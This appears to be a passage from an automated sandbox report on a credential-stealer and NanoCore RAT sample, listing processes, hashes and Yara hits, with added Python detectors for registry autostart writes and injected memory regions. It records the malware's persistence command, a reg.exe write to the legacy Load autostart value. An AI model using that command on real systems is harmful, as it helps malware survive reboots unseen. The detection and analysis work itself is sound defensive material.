                                Path:C:\Users\user\AppData\Roaming\putty.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Users\user\AppData\Roaming\putty.exe
                                Imagebase:0x100000
                                File size:731648 bytes
                                MD5 hash:0CFE251E0B61BBC87656F52DEFAD4C53
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: AveMaria_WarZone, Description: unknown, Source: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Author: unknown
                                Reputation:low

                                General

                                Start time:10:59:56
                                Start date:02/08/2021
                                Path:C:\Windows\SysWOW64\cmd.exe
                                Wow64 process (32bit):true
                                Commandline:cmd.exe /c REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe'
                                Imagebase:0x49d30000
                                File size:302592 bytes
                                MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                General

                                Start time:10:59:56
                                Start date:02/08/2021
                                Path:C:\ProgramData\images.exe
                                Wow64 process (32bit):true
                                Commandline:C:\ProgramData\images.exe
                                Imagebase:0x1180000
                                File size:731648 bytes
                                MD5 hash:0CFE251E0B61BBC87656F52DEFAD4C53
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Yara matches:
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.2139607287.0000000003911000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000011.00000002.2139607287.0000000003911000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000011.00000002.2136747408.0000000002947000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000011.00000002.2136747408.0000000002947000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000011.00000002.2136747408.0000000002947000.00000004.00000001.sdmp, Author: Joe Security
                                Antivirus matches:
                                • Detection: 100%, Joe Sandbox ML
                                • Detection: 28%, ReversingLabs

                                General

                                Start time:10:59:57
                                Start date:02/08/2021
                                Path:C:\Windows\SysWOW64\reg.exe
                                Wow64 process (32bit):true
                                Commandline:REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe'
                                Imagebase:0xb50000
                                File size:62464 bytes
                                MD5 hash:D69A9ABBB0D795F21995C2F48C1EB560
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
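The cmd.exe and reg.exe entries above are the persistence step of this chain: the Load value under HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows is a legacy autostart location processed at user logon, it is rarely monitored because it is not one of the well-known Run keys, and it now points at the dropped C:\ProgramData\images.exe. The detection below is an added example, not part of this report or of any Joe Sandbox tooling. It tokenises process command lines (accepting the single quotes the report shows in place of double quotes), normalises the hive abbreviation, and flags `reg add` writes to this key and to the other common autostart locations. The sample command lines are constructed: the first two copy the entries above, the rest are variants and negative controls.

```python
import re

# Constructed sample command lines. The first two reproduce the cmd.exe and reg.exe
# entries recorded above (the report shows the double quotes as single quotes); the
# rest are constructed variants plus two controls that must not fire.
SAMPLE_COMMAND_LINES = [
    r"cmd.exe /c REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe'",
    r"REG ADD 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /f /v Load /t REG_SZ /d 'C:\ProgramData\images.exe'",
    r'C:\Windows\System32\reg.exe add "HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows" /v Run /d "C:\Users\Public\x.exe" /f',
    r'reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v Updater /t REG_SZ /d "C:\Program Files\Vendor\updater.exe" /f',
    r'reg add "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v Shell /t REG_SZ /d "explorer.exe,C:\ProgramData\images.exe" /f',
    r"reg query 'HKCU\Software\Microsoft\Windows NT\CurrentVersion\Windows' /v Load",  # read, not write
    r"reg add HKCU\Software\Vendor\App /v Theme /t REG_SZ /d dark /f",                 # not an autostart key
]

# Quoted tokens (either quote style) or bare whitespace-separated tokens.
_TOKEN = re.compile(r"""'[^']*'|"[^"]*"|\S+""")

_HIVES = {"HKCU": "HKEY_CURRENT_USER", "HKLM": "HKEY_LOCAL_MACHINE",
          "HKU": "HKEY_USERS", "HKCR": "HKEY_CLASSES_ROOT"}

# Autostart locations (path below the hive, lower case) -> (value names that matter, label).
# None as the name set means every value written under the key is an autostart entry.
WATCHED = {
    r"software\microsoft\windows nt\currentversion\windows":
        ({"load", "run"}, "legacy Load/Run autostart under Windows NT\\CurrentVersion\\Windows"),
    r"software\microsoft\windows nt\currentversion\winlogon":
        ({"shell", "userinit"}, "Winlogon Shell/Userinit replacement"),
    r"software\microsoft\windows\currentversion\run": (None, "Run key autostart"),
    r"software\microsoft\windows\currentversion\runonce": (None, "RunOnce key autostart"),
}


def tokenize(cmdline):
    return [t.strip("'\"") for t in _TOKEN.findall(cmdline)]


def parse_reg_add(cmdline):
    """Return {"key", "value", "type", "data"} for a `reg add` invocation, else None."""
    toks = tokenize(cmdline)
    for i, tok in enumerate(toks[:-2]):
        exe = tok.lower().rsplit("\\", 1)[-1]          # tolerate a full path to reg.exe
        if exe in ("reg", "reg.exe") and toks[i + 1].lower() == "add":
            break
    else:
        return None
    hive, _, path = toks[i + 2].partition("\\")
    entry = {"key": _HIVES.get(hive.upper(), hive.upper()) + "\\" + path,
             "value": "", "type": "REG_SZ", "data": ""}
    args = toks[i + 3:]
    j = 0
    while j < len(args):
        flag = args[j].lower()
        if flag in ("/v", "/t", "/d", "/s") and j + 1 < len(args):
            if flag != "/s":                        # /s takes a separator operand we do not need
                entry[{"/v": "value", "/t": "type", "/d": "data"}[flag]] = args[j + 1]
            j += 2
        else:
            j += 1                                  # /f, /ve, /reg:32|64 carry no operand
    return entry


def classify(cmdline):
    """Return a finding if the command line writes an autostart value, else None."""
    entry = parse_reg_add(cmdline)
    if entry is None:
        return None
    path = entry["key"].partition("\\")[2].lower().rstrip("\\")
    if path not in WATCHED:
        return None
    names, label = WATCHED[path]
    if names is not None and entry["value"].lower() not in names:
        return None
    return {"technique": label, **entry, "cmdline": cmdline}


def scan(cmdlines):
    return [f for f in map(classify, cmdlines) if f]


if __name__ == "__main__":
    for f in scan(SAMPLE_COMMAND_LINES):
        print(f"{f['technique']}: {f['key']}\\{f['value']} = {f['data']}")
```

Matching on the parsed key and value name rather than on a substring of the raw command line is what keeps the rule robust to quoting, hive abbreviations and argument order; the reg.exe entry above puts /f before /v, and the same write could equally arrive through cmd.exe /c as in the first entry.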

                                General

                                Start time:11:00:00
                                Start date:02/08/2021
                                Path:C:\Windows\System32\verclsid.exe
                                Wow64 process (32bit):false
                                Commandline:'C:\Windows\system32\verclsid.exe' /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5
                                Imagebase:0xff8f0000
                                File size:11776 bytes
                                MD5 hash:3796AE13F680D9239210513EDA590E86
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                General

                                Start time:11:00:02
                                Start date:02/08/2021
                                Path:C:\ProgramData\images.exe
                                Wow64 process (32bit):true
                                Commandline:C:\ProgramData\images.exe
                                Imagebase:0x1180000
                                File size:731648 bytes
                                MD5 hash:0CFE251E0B61BBC87656F52DEFAD4C53
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000015.00000003.2137169067.0000000000613000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000015.00000003.2137169067.0000000000613000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000015.00000002.2353065694.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000015.00000002.2353065694.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000015.00000002.2353065694.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: AveMaria_WarZone, Description: unknown, Source: 00000015.00000002.2353065694.0000000000400000.00000040.00000001.sdmp, Author: unknown
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000015.00000003.2137304291.0000000000607000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000015.00000003.2137304291.0000000000607000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000015.00000003.2137077371.0000000000603000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000015.00000003.2137077371.0000000000603000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000015.00000003.2137213660.0000000000607000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 00000015.00000003.2137213660.0000000000607000.00000004.00000001.sdmp, Author: Joe Security

                                General

                                Start time:11:00:02
                                Start date:02/08/2021
                                Path:C:\Windows\System32\notepad.exe
                                Wow64 process (32bit):false
                                Commandline:'C:\Windows\system32\NOTEPAD.EXE' 'C:\Users\user\AppData\Local\Temp\abdtfhghgdghgh .ScT'
                                Imagebase:0xff1d0000
                                File size:193536 bytes
                                MD5 hash:B32189BDFF6E577A92BAA61AD49264E6
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                General

                                Start time:11:00:04
                                Start date:02/08/2021
                                Path:C:\Windows\SysWOW64\cmd.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\System32\cmd.exe
                                Imagebase:0x4ab20000
                                File size:302592 bytes
                                MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                General

                                Start time:11:00:16
                                Start date:02/08/2021
                                Path:C:\Users\user\AppData\Roaming\iBCrDCK.i.exe
                                Wow64 process (32bit):true
                                Commandline:'C:\Users\user\AppData\Roaming\iBCrDCK.i.exe'
                                Imagebase:0xf50000
                                File size:1378816 bytes
                                MD5 hash:8FA8F52DFC55D341300EFF8E4C44BA33
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Antivirus matches:
                                • Detection: 100%, Joe Sandbox ML
                                • Detection: 20%, ReversingLabs

                                General

                                Start time:11:00:22
                                Start date:02/08/2021
                                Path:C:\Windows\System32\drvinst.exe
                                Wow64 process (32bit):false
                                Commandline:DrvInst.exe '1' '200' 'UMB\UMB\1&841921d&0&TERMINPUT_BUS' '' '' '6e3bed883' '0000000000000000' '000000000000059C' '0000000000000600'
                                Imagebase:0xff860000
                                File size:102912 bytes
                                MD5 hash:2DBA1472BDF847EAE358A4B9FA9AB0C1
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                General

                                Start time:11:00:22
                                Start date:02/08/2021
                                Path:C:\Windows\System32\drivers\rdpdr.sys
                                Wow64 process (32bit):false
                                Commandline:
                                Imagebase:0xff380000
                                File size:165888 bytes
                                MD5 hash:1B6163C503398B23FF8B939C67747683
                                Has elevated privileges:
                                Has administrator privileges:
                                Programmed in:C, C++ or other language

                                General

                                Start time:11:00:23
                                Start date:02/08/2021
                                Path:C:\Windows\system32\drivers\tdtcp.sys
                                Wow64 process (32bit):
                                Commandline:
                                Imagebase:
                                File size:23552 bytes
                                MD5 hash:51C5ECEB1CDEE2468A1748BE550CFBC8
                                Has elevated privileges:
                                Has administrator privileges:
                                Programmed in:C, C++ or other language

                                General

                                Start time:11:00:24
                                Start date:02/08/2021
                                Path:C:\Windows\System32\DRIVERS\tssecsrv.sys
                                Wow64 process (32bit):
                                Commandline:
                                Imagebase:
                                File size:39936 bytes
                                MD5 hash:19BEDA57F3E0A06B8D5EB6D619BD5624
                                Has elevated privileges:
                                Has administrator privileges:
                                Programmed in:C, C++ or other language

                                General

                                Start time:11:00:24
                                Start date:02/08/2021
                                Path:C:\Windows\System32\Drivers\RDPWD.SYS
                                Wow64 process (32bit):
                                Commandline:
                                Imagebase:
                                File size:212480 bytes
                                MD5 hash:FE571E088C2D83619D2D48D4E961BF41
                                Has elevated privileges:
                                Has administrator privileges:
                                Programmed in:C, C++ or other language

                                General

                                Start time:11:00:37
                                Start date:02/08/2021
                                Path:C:\Users\user\AppData\Roaming\iBCrDCK.i.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Users\user\AppData\Roaming\iBCrDCK.i.exe
                                Imagebase:0xf50000
                                File size:1378816 bytes
                                MD5 hash:8FA8F52DFC55D341300EFF8E4C44BA33
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language

                                General

                                Start time:11:00:37
                                Start date:02/08/2021
                                Path:C:\Users\user\AppData\Roaming\iBCrDCK.i.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Users\user\AppData\Roaming\iBCrDCK.i.exe
                                Imagebase:0xf50000
                                File size:1378816 bytes
                                MD5 hash:8FA8F52DFC55D341300EFF8E4C44BA33
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Yara matches:
                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000022.00000002.2354192632.0000000000AC0000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000022.00000002.2354192632.0000000000AC0000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000022.00000002.2354334039.0000000000C60000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000022.00000002.2354334039.0000000000C60000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000022.00000002.2354257408.0000000000BF0000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000022.00000002.2354257408.0000000000BF0000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000022.00000002.2359934676.0000000003678000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: NanoCore, Description: unknown, Source: 00000022.00000002.2359934676.0000000003678000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000022.00000002.2353616508.00000000003F0000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000022.00000002.2353616508.00000000003F0000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000022.00000002.2354275744.0000000000C00000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000022.00000002.2354275744.0000000000C00000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000022.00000002.2354246259.0000000000BE0000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000022.00000002.2354246259.0000000000BE0000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000022.00000002.2353937433.00000000005D0000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000022.00000002.2353937433.00000000005D0000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000022.00000002.2354319095.0000000000C50000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000022.00000002.2354319095.0000000000C50000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000022.00000002.2359482992.00000000034F9000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: NanoCore, Description: unknown, Source: 00000022.00000002.2359482992.00000000034F9000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000022.00000002.2354021800.0000000000800000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000022.00000002.2354021800.0000000000800000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: NanoCore, Description: unknown, Source: 00000022.00000002.2355684386.0000000002502000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000022.00000002.2354370818.0000000000CB0000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000022.00000002.2354370818.0000000000CB0000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000022.00000002.2355475529.00000000024B1000.00000004.00000001.sdmp, Author: Joe Security
                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000022.00000002.2354478955.0000000000D70000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000022.00000002.2354478955.0000000000D70000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: NanoCore, Description: unknown, Source: 00000022.00000002.2360227304.0000000003777000.00000004.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000022.00000002.2353673485.0000000000402000.00000040.00000001.sdmp, Author: Florian Roth
                                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000022.00000002.2353673485.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                • Rule: NanoCore, Description: unknown, Source: 00000022.00000002.2353673485.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000022.00000002.2353950327.00000000005E0000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000022.00000002.2353950327.00000000005E0000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000022.00000002.2354423822.0000000000CD0000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000022.00000002.2354423822.0000000000CD0000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000022.00000002.2353767111.0000000000440000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: Nanocore_RAT_Feb18_1, Description: Detects Nanocore RAT, Source: 00000022.00000002.2353767111.0000000000440000.00000004.00000001.sdmp, Author: Florian Roth
                                • Rule: JoeSecurity_Nanocore, Description: Yara detected Nanocore RAT, Source: 00000022.00000002.2353767111.0000000000440000.00000004.00000001.sdmp, Author: Joe Security
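Each Yara match above names its source as a dump identifier such as 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp. Reading that identifier is what turns a list of rule names into an injection finding: the fourth field is the region base and the fifth its page protection (0x40 is PAGE_EXECUTE_READWRITE, 0x04 is PAGE_READWRITE, as defined in winnt.h). Every AveMaria_WarZone and MAL_Envrial_Jan18_1 hit sits in a PAGE_EXECUTE_READWRITE region at 0x400000, although putty.exe and images.exe are recorded with image bases 0x100000 and 0x1180000, and the NanoCore hits in iBCrDCK.i.exe (image base 0xF50000) include an RWX region at 0x402000: that is code written into the process at run time, not the loaded image, which is where an analyst should dump and unpack first. The parser below is an added example, not code from this report or from Joe Sandbox; its reading of the six fields as process index, dump phase, dump id, base address, protection and kind is an assumption inferred from how the identifiers vary across this page. Its input is a subset of the match lines above, copied verbatim, and the image bases come from the corresponding process records.

```python
import re
from collections import defaultdict

# Win32 page-protection constants (winnt.h).
PAGE_READWRITE = 0x04
PAGE_EXECUTE_READWRITE = 0x40

# Image bases of the processes summarised below, taken from the "Imagebase" lines of
# the corresponding process records in this report (process index -> image base).
IMAGE_BASES = {0x0D: 0x100000, 0x0F: 0x100000, 0x11: 0x1180000, 0x15: 0x1180000, 0x22: 0xF50000}

# A subset of the Yara match lines from the records above, copied verbatim.
SAMPLE_MATCHES = """\
Rule: JoeSecurity_AveMaria, Description: Yara detected AveMaria stealer, Source: 0000000D.00000003.2118755811.00000000005B6000.00000004.00000001.sdmp, Author: Joe Security
Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Author: Florian Roth
Rule: AveMaria_WarZone, Description: unknown, Source: 0000000D.00000002.2123143696.0000000000400000.00000040.00000001.sdmp, Author: unknown
Rule: AveMaria_WarZone, Description: unknown, Source: 0000000F.00000002.2119927907.0000000000400000.00000040.00000001.sdmp, Author: unknown
Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000011.00000002.2136747408.0000000002947000.00000004.00000001.sdmp, Author: Joe Security
Rule: AveMaria_WarZone, Description: unknown, Source: 00000015.00000002.2353065694.0000000000400000.00000040.00000001.sdmp, Author: unknown
Rule: Nanocore_RAT_Gen_2, Description: Detetcs the Nanocore RAT, Source: 00000022.00000002.2354192632.0000000000AC0000.00000004.00000001.sdmp, Author: Florian Roth
Rule: NanoCore, Description: unknown, Source: 00000022.00000002.2353673485.0000000000402000.00000040.00000001.sdmp, Author: Kevin Breen <kevin@techanarchy.net>
"""

_LINE = re.compile(
    r"Rule: (?P<rule>[^,]+), Description: (?P<desc>.*?), "
    r"Source: (?P<src>[0-9A-Fa-f.]+)\.sdmp, Author: (?P<author>.*)"
)

# Names for the six dot-separated hex fields of a dump identifier. This layout is an
# assumption inferred from how the identifiers vary across this report.
_FIELDS = ("process", "phase", "dump_id", "base", "protection", "kind")


def parse_source(src):
    """Decode one dump identifier (without the .sdmp suffix) into its fields."""
    parts = [int(p, 16) for p in src.split(".")]
    if len(parts) != len(_FIELDS):
        raise ValueError(f"unexpected dump identifier: {src}")
    return dict(zip(_FIELDS, parts))


def parse_matches(text):
    """Parse 'Rule: ..., Source: ..., Author: ...' lines into records."""
    records = []
    for line in text.splitlines():
        m = _LINE.search(line)
        if m:
            rec = m.groupdict()
            rec.update(parse_source(rec.pop("src")))
            records.append(rec)
    return records


def summarize(text, image_bases=IMAGE_BASES):
    """Per process: the rules that fired and the RWX regions that are not the loaded image.

    A mapped PE image's code is normally PAGE_EXECUTE_READ; a Yara hit in a
    PAGE_EXECUTE_READWRITE region whose base is not the process's own image base is
    code that was written into the process at run time (injection or manual mapping).
    """
    per_proc = defaultdict(lambda: {"rules": set(), "foreign_rwx": set()})
    for rec in parse_matches(text):
        info = per_proc[rec["process"]]
        info["rules"].add(rec["rule"])
        if rec["protection"] == PAGE_EXECUTE_READWRITE and rec["base"] != image_bases.get(rec["process"]):
            info["foreign_rwx"].add(rec["base"])
    return dict(per_proc)


def injected_payload_regions(text, image_bases=IMAGE_BASES):
    """Sorted (process index, region base) pairs worth dumping and unpacking first."""
    return sorted(
        (proc, base)
        for proc, info in summarize(text, image_bases).items()
        for base in info["foreign_rwx"]
    )


if __name__ == "__main__":
    for proc, info in sorted(summarize(SAMPLE_MATCHES).items()):
        rwx = ", ".join(f"{b:#x}" for b in sorted(info["foreign_rwx"])) or "none"
        print(f"process {proc:#x}: rules={sorted(info['rules'])} foreign RWX regions={rwx}")
```

The PAGE_READWRITE hits (the 0x5B6000 and 0xAC0000 regions, for instance) are heap or configuration data rather than code and are deliberately not treated as payload regions; they are still useful, since the NanoCore hits in those regions are where the RAT's decrypted configuration tends to live.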

                                Disassembly

                                Code Analysis


                                  Executed Functions

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2108539804.000007FF00270000.00000040.00000001.sdmp, Offset: 000007FF00270000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b8dafd40702bcbcfa6f5b44c463f1adf58869558403f9f094bbd41efb5b446ef
                                  • Instruction ID: bc9b8a651e376cc0771dd43052e4bd07343ee4bd24bac5815e57d65d8ca79de6
                                  • Opcode Fuzzy Hash: b8dafd40702bcbcfa6f5b44c463f1adf58869558403f9f094bbd41efb5b446ef
                                  • Instruction Fuzzy Hash: A1518B1190EBC24FE75357786C667A17FA09F17210F0A01E7D488CB0A3E9585E99C3A2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.2108539804.000007FF00270000.00000040.00000001.sdmp, Offset: 000007FF00270000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d02c3ab41870044e4216fe2c71aafc5dacae852357c1ac1c50f6fb8e0598cc48
                                  • Instruction ID: 85513f23e1e8d4934d6830386ade2547c3c7b6c115776f252e8187d5df895b82
                                  • Opcode Fuzzy Hash: d02c3ab41870044e4216fe2c71aafc5dacae852357c1ac1c50f6fb8e0598cc48
                                  • Instruction Fuzzy Hash: 0A11789684E7D44FD70353746DA52913FB0AF6B224B4E02DBE884CE0B3E1590A99C363
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions

                                  Executed Functions

                                  Memory Dump Source
                                  • Source File: 00000006.00000002.2119274032.000007FF00270000.00000040.00000001.sdmp, Offset: 000007FF00270000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8cc858c49b3505dd0e02519f271b26a16f33040c05ef4b48095cb913cd2d347b
                                  • Instruction ID: 513a83a8cf792523e4f363f9f0e38ff33a5dc65a6d80c30fea00f3217429ac5c
                                  • Opcode Fuzzy Hash: 8cc858c49b3505dd0e02519f271b26a16f33040c05ef4b48095cb913cd2d347b
                                  • Instruction Fuzzy Hash: 4651CF1150E7C28FE34757786C666E17FB09F17210F1A01E7D488CB0A3D9596E99C7A2
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Non-executed Functions

                                  Executed Functions

                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: 4v
                                  • API String ID: 0-2653448934
                                  • Opcode ID: e5cddce35e014618426039f6f9246a2fa8e2a11751644e16769aae6242e82749
                                  • Instruction ID: 015a328f9228f5056dde7de2493fd534324902896baca5d65abc1b347501acd0
                                  • Opcode Fuzzy Hash: e5cddce35e014618426039f6f9246a2fa8e2a11751644e16769aae6242e82749
                                  • Instruction Fuzzy Hash: 2B13C574A11618CFC765DF34C894BA9B7B6FF8A304F2092E9E5096B260DB316E84CF45
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Strings
                                  Memory Dump Source
                                  • Source File: 0000000A.00000002.2116413748.00000000002A0000.00000040.00000001.sdmp, Offset: 002A0000, based on PE: false
                                  Similarity
                                  • API ID:
                                  • String ID: b.
                                  • API String ID: 0-890368386
                                  • Opcode ID: f6a0bf6d3068174a2b88b01ff38e7690869309a85c4b884fc6ed8101c93cc75a
